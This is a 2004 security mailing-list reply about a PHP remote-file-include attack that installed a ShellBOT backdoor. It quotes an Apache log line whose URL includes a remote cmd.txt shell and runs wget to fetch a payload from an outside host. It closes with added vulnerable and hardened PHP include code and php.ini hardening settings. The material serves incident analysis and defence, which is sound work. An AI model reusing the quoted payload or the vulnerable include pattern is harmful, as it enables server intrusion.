Re: Systems compromised with ShellBOT perl script - part 2
From: Chris Norton (kicktd_list_at_hotmail.com)
Date: 10/21/04
- Previous message: David Gillett: "RE: DoS worm"
- In reply to: Dave: "Re: Systems compromised with ShellBOT perl script - part 2"
- Next in thread: Jim Halfpenny: "re: Systems compromised with ShellBOT perl script - part 2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <incidents@securityfocus.com> Date: Thu, 21 Oct 2004 11:53:08 -0500
This sounds like it may be a typical fopen()/include() PHP exploit, as this
seems to be the motive for this group, as seen from the very first post:
> Kirby Angell wrote:
>
> Yesterday we noticed a funny looking Apache log entry. It contained:
>
> http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2
Here a remote PHP shell script is included, and then the backdoor is uploaded
onto the server. This can be avoided by setting the safe_mode setting in
php.ini to On and setting disable_functions to include exec, popen, and
passthru.
-- Chris Norton UAT Student Software Engineering Network Defense
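The include pattern Chris describes, shown as an added example that is not part of the original post or the list archive: the vulnerable form passes the `id` request parameter straight to `include()`, so with URL wrappers enabled a value such as `http://.../cmd.txt` is fetched and executed; the hardened form maps the parameter through a fixed allow-list so no user-controlled string reaches `include()`. The function names, the `PAGE_MAP` constant and the `pages/` directory are assumptions made for the example. The php.ini block lists the directives that remove the remote-include primitive itself; note that `safe_mode`, suggested in the post, was removed in PHP 5.4, so on current PHP the `allow_url_include` / `allow_url_fopen` settings and the allow-list are the controls that matter.

```php
<?php
// Added example (not from the original post or list archive). Shows the
// remote-file-include pattern the message describes and a hardened replacement.

// VULNERABLE: the request parameter is passed straight to include(). With
// allow_url_fopen/allow_url_include enabled, ?id=http://host/cmd.txt makes PHP
// fetch and execute the remote file. Shown for contrast only.
function vulnerable_page(): void
{
    include($_GET['id']);
}

// HARDENED: map the parameter to a fixed allow-list of local templates and
// reject anything else. Path names below are assumptions for the example.
const PAGE_MAP = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Returns the local template path for a known page id, or null for anything
// not in the allow-list (URLs, ../ sequences, wrapper schemes all fall here).
function resolve_page(string $id): ?string
{
    return PAGE_MAP[$id] ?? null;
}

function hardened_page(): void
{
    $target = resolve_page($_GET['id'] ?? 'home');
    if ($target === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $target;   // only an allow-listed local path can reach here
}

/*
 * php.ini settings that remove the remote-include primitive entirely; they
 * complement the allow-list rather than replace it:
 *
 *   allow_url_include = Off   ; include()/require() never fetch URLs (PHP >= 5.2)
 *   allow_url_fopen   = Off   ; fopen()/file_get_contents() never fetch URLs
 *   disable_functions = exec,passthru,shell_exec,system,popen,proc_open
 *
 * safe_mode, as suggested in the post, existed in PHP 4 and 5.x but was
 * removed in PHP 5.4 and is not available on current releases.
 */
```

With the allow-list in place the log entry quoted above would be answered with a 404 rather than a fetch of `cmd.txt`; with `allow_url_include = Off` the `include()` would refuse the URL even in the vulnerable version, which is why a defender wants both layers.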